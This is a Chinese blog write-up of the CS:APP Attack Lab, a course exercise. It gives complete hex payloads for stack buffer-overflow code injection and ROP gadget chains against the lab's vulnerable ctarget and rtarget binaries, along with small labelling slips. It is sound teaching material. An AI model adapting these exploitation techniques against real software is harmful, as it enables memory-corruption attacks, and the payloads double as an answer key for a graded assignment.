CSAPP AttackLab_csabp-CSDN博客

本文链接：https://blog.csdn.net/qq_40955029/article/details/121916406

实验内容

Level 1

实验内容

一共两个可执行文件ctarget和rtarget，分为5个level，需要通过一定方式构造缓冲区溢出攻击。

下面是实验提供的一些程序：

ctarget与rtarget是可执行文件，需对这两个程序构造攻击。
- 命令-q不向服务器发送数据。
- 命令-i FILE从FILE文件中读取而不是由终端输入。
- 用gdb进行调试时，可以用gdb --args ctarget -q -i FILE进行调试。
hex2raw是用于将字符的十六进制形式转换为字符，例如想在终端中输入0x01这个字符，无法用键盘打出，此时可以用hex2raw将其输出至文件中，再用文件对ctarget进行输入。下面的命令可以从exploit.ext构造出exploit-raw.txt，注意exploit.txt中的字符十六进制形式用空格隔开，以换行符结束。

./hex2raw < exploit.txt > exploit-raw.txt

可以编写汇编代码，再利用gcc -c和objdump -d进行汇编和反汇编得到相应代码的二进制形式。

Level 1

需要getbuf执行完后不返回test，而是转到touch1。

void test()
{
  int val;
  val = getbuf();
  printf("No exploit. Getbuf returned 0x%x\n", val);
}

void touch1()
{
  vlevel = 1; /* Part of validation protocol */
  printf("Touch1!: You called touch1()\n");
  validate(1);
  exit(0);
}

反汇编观察getbuf和touch1函数有分配了40个字符的空间，故输入40个字符后再按字节输入touch1的地址即可。

0000000000401968 <test>:
  ...
  401971:	e8 32 fe ff ff       	callq  4017a8 <getbuf>
  401976:	89 c2                	mov    %eax,%edx
  ...

00000000004017a8 <getbuf>:
  4017a8:	48 83 ec 28          	sub    $0x28,%rsp  //分配了0x28大小的空间
  4017ac:	48 89 e7             	mov    %rsp,%rdi
  4017af:	e8 8c 02 00 00       	callq  401a40 <Gets>
  4017b4:	b8 01 00 00 00       	mov    $0x1,%eax
  4017b9:	48 83 c4 28          	add    $0x28,%rsp
  4017bd:	c3                   	retq
  4017be:	90                   	nop
  4017bf:	90                   	nop

00000000004017c0 <touch1>:
  ...
  ...

touch1的地址为0x4017c0，将返回地址修改即可。可以用gdb测试一下机器的字节排列顺序，为小端模式：

故在输入任意40个字符后，再输入touch1的地址即可：

//40个填充
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
//touch1入口地址 
c0 17 40 00 00 00 00 00

Level 2

目标是getbuf后转向到touch2函数：

void touch2(unsigned val)
{
  vlevel = 2; /* Part of validation protocol */
  if (val == cookie) {
    printf("Touch2!: You called touch2(0x%.8x)\n", val);
    validate(2);
  } else {
    printf("Misfire: You called touch2(0x%.8x)\n", val);
    fail(2);
  }
  exit(0);
}

由于touch2的参数需要%edi来传递，所以需要植入代码mycode，getbuf返回到mycode，在mycode修改%edi后再返回touch2。

用gdb打印出%rsp的值可以知道：

0x5561dc78 ~ 0x5561dca0是我们输入的前40个字符的位置。
0x5561dca0 ~ 0x5561dca8存储着getbuf的返回地址。
在调用我们植入的函数mycode后，可以把touch3的地址入栈，待mycode返回后即可返回touch2。

所以mycode函数的入口地址应该为0x5561dc78，即从此处开始是我们的植入代码。0x5561dca0存储的返回地址就是mycode的入口地址。而植入的代码很简单，将%edi置为我们的cookie，再把返回地址touch2入栈即可：

0000000000000000 <.text>:
   0:	bf fa 97 b9 59       	mov    $0x59b997fa,%edi
   5:	68 ec 17 40 00       	pushq  $0x4017ec
   a:	c3                   	retq

故可以得到输入的字符应为：

//mycode函数
bf fa 97 b9 59 68 ec 17 40 00 c3 
//29个填充
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
//mycode入口地址
78 dc 61 55 00 00 00 00

Level 3

目标是转到touch3函数，不过传递的参数是一个字符串的首地址，字符串的内容是cookie的串形式。

void touch3(char *sval)
{
  vlevel = 3; /* Part of validation protocol */
  if (hexmatch(cookie, sval)) {
    printf("Touch3!: You called touch3(\"%s\")\n", sval);
    validate(3);
  } else {
    printf("Misfire: You called touch3(\"%s\")\n", sval);
    fail(3);
  }
  exit(0);
}

/* Compare string to hex represention of unsigned value */
int hexmatch(unsigned val, char *sval)
{
  char cbuf[110];
  /* Make position of check string unpredictable */
  char *s = cbuf + random() % 100;
  sprintf(s, "%.8x", val);
  return strncmp(sval, s, 9) == 0;
}

字符串应该存储在%rsp之上。因为调用touch3后，%rsp下的内容会被touch3和hexmatch重写。故字符串的首地址应该为0x5561dca8。
mycode的入口地址位于0x5561dc78，需要把字符串首地址存入%edi，然后把touch3的地址入栈返回即可。

mycode的内容如下：

0000000000000000 <.text>:
   0:	bf a8 dc 61 55       	mov    $0x5561dca8,%edi
   5:	68 fa 18 40 00       	pushq  $0x4018fa
   a:	c3                   	retq

故输入的字符串应该为：

//mycode内容
bf a8 dc 61 55 68 fa 18 40 00 c3 
//剩余的29个填充
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
//mycode返回地址
78 dc 61 55 00 00 00 00 
//cookie的字符串形式，以'\0'结尾
35 39 62 39 39 37 66 61 00

下面两个level需要攻击rtarget程序，rtarget采用了栈随机化和限制可执行代码区域两个防止攻击的手段，所以无法利用植入代码攻击，要通过ROP实现。

rtarget提供了一个gadget farm，如果我们想执行gadget1和gadget2，那么在填入40个字符后分别填入gadget1和gadget2的地址即可：

getbuf retq时，栈指针指向gadget1地址，返回将返回至gadget1，然后栈指针上移，指向gadget2的地址。
gadget1执行完 retq时，正好返回到gadget2的入口处。

实验手册的附录给出了各种指令的编码，构造gadget时查阅即可，比较重要的有单字节nop(90)，双字节nop(...)以及retq(c3)。

Level 4

用ROP的方法实现touch2的调用，主要思路是执行若干个gadget，使得%rdi = cookie，然后再返回至touch2即可。为了把cookie存储在寄存器中，需要提前把它写进栈，再利用popq指令弹出到寄存器即可，然后再把这个值mov到%rdi寄存器，最后返回，根据返回地址转移到touch2即可。

gedget farm部分代码：

000000000040199a <getval_142>:
  40199a:	b8 fb 78 90 90       	mov    $0x909078fb,%eax
  40199f:	c3                   	retq   

00000000004019a0 <addval_273>:
  4019a0:	8d 87 48 89 c7 c3    	lea    -0x3c3876b8(%rdi),%eax
  4019a6:	c3                   	retq   

00000000004019a7 <addval_219>:
  4019a7:	8d 87 51 73 58 90    	lea    -0x6fa78caf(%rdi),%eax
  4019ad:	c3                   	retq   

00000000004019ae <setval_237>:
  4019ae:	c7 07 48 89 c7 c7    	movl   $0xc7c78948,(%rdi)
  4019b4:	c3                   	retq   

00000000004019b5 <setval_424>:
  4019b5:	c7 07 54 c2 58 92    	movl   $0x9258c254,(%rdi)
  4019bb:	c3                   	retq   

00000000004019bc <setval_470>:
  4019bc:	c7 07 63 48 8d c7    	movl   $0xc78d4863,(%rdi)
  4019c2:	c3                   	retq   

00000000004019c3 <setval_426>:
  4019c3:	c7 07 48 89 c7 90    	movl   $0x90c78948,(%rdi)
  4019c9:	c3                   	retq   

00000000004019ca <getval_280>:
  4019ca:	b8 29 58 90 c3       	mov    $0xc3905829,%eax
  4019cf:	c3                   	retq   

//还有一部分level5才需要用到，没有列出

部分编码表：

对照编码表可以看到addval_219中 58 90 正好是popq %rax的编码，且后续正好是nop指令，满足第一步将cookie从栈中弹出的要求，此为gadget1。
接下来需要找到movq %rax,%rdi即可，编码为 48 89 c7 。setval_426中正好有这样的一部分，此为gadget2。注意，虽然setval_237中也有相同的一部分，但是后续是c7而不是nop指令的90。

控制的代码为：

gadget1:
    popq %rax
gadget2:
    movq %rax,%rdi
touch2:
    ...

故容易知道输入应该为：

//40个填充
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

//gadget1入口
ab 19 40 00 00 00 00 00

//弹出栈的cookie
fa 97 b9 59 00 00 00 00

//gadget2入口
c5 19 40 00 00 00 00 00

//touch2入口
ec 17 40 00 00 00 00 00

Level 5

用ROP的方法实现touch3的调用，该阶段的主要问题在于需要把%rsp的值传入%rdi，而我们不能等%rsp到达字符串位置再把%rsp传入%rdi。因为如果某个函数中%rsp恰好处于字符串首地址的位置，而%rsp指向的位置代表着这个函数的返回地址。因此这个函数的返回地址将是我们的字符串，意味着不能返回到我们指定的位置。

可以假设我们的栈是这样的：

---mystring
---gadgetn地址
   ...
---gadget2地址
---gadget1地址

那么可以进行这样的操作，把gadget1处的%rsp传入%rdi，然后再进行一个加法操作，即%rdi = %rdi + （8 * n），这里的8 * n是我们在构造时就知道的具体数字，选择恰当的n即可使%rdi指向我们字符串的开头。

实验手册里很狡猾的没有提供add指令的编码，但是可以发现在farm中有一个函数add_xy：

00000000004019d6 <add_xy>:
  4019d6:	48 8d 04 37          	lea    (%rdi,%rsi,1),%rax
  4019da:	c3                   	retq

我们可以利用这个完整的函数实现加法运算即可，不需要自己构造出一个加法指令。

但是由于farm中没有精确符合的编码，所以需要稍微过渡一下（例如从栈中弹出到%rdi，只能先弹出到%rax，再mov到%rdi）。同时在farm中寻找时，需要注意编码后要紧接retq(c3)或者紧接着一些单字节或双字节nop。可构造的代码如下：

gadget1:
    popq %rax          //58        //<addval_219>
gadget2:
    movq %eax, %edx    //89 c2     //<getval_481>
gadget3:
    movl %edx, %ecx    //89 d1     //<getval_311>
gadget4:    
    movl %ecx, %esi    //89 ce     //<addval_436>
gadget5:
    movq %rsp, %rax    //48 89 e0  //<addval_190>
gadget6:
    movq %rax, %rdi    //48 89 c7  //<setval_426>
gadget7:
    <add_xy>           //...       //<add_xy>
gadget8:
    movq %rax, %rdi    //48 89 c7  //<setval_426>
touch3:
    ...

输入的字符串应该为：

//40个填充
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

//gadget1:    popq %rax    <addval_219>    
ab 19 40 00 00 00 00 00

//需要popq出来的数字 = 4 * 8 = 32 = 0x20
20 00 00 00 00 00 00 00

//gadget2:    movq %eax, %edx    <getval_481>   
dd 19 40 00 00 00 00 00

//gadget3:    movl %edx, %ecx    <getval_311>    
69 1a 40 00 00 00 00 00

//gadget4:    movl %ecx, %esi    <addval_436>    
13 1a 40 00 00 00 00 00

//gadget5:    movq %rsp, %rax    <addval_190>    
06 1a 40 00 00 00 00 00  

//gadget6:    movq %rax, %rdi    <setval_426>    
c5 19 40 00 00 00 00 00

//gadget7:    movq %rax, %rdi    <add_xy>
d6 19 40 00 00 00 00 00

//gadget8:    movq %rax, %rdi    <setval_426>    
c5 19 40 00 00 00 00 00

//touch3
fa 18 40 00 00 00 00 00

//字符串
35 39 62 39 39 37 66 61 00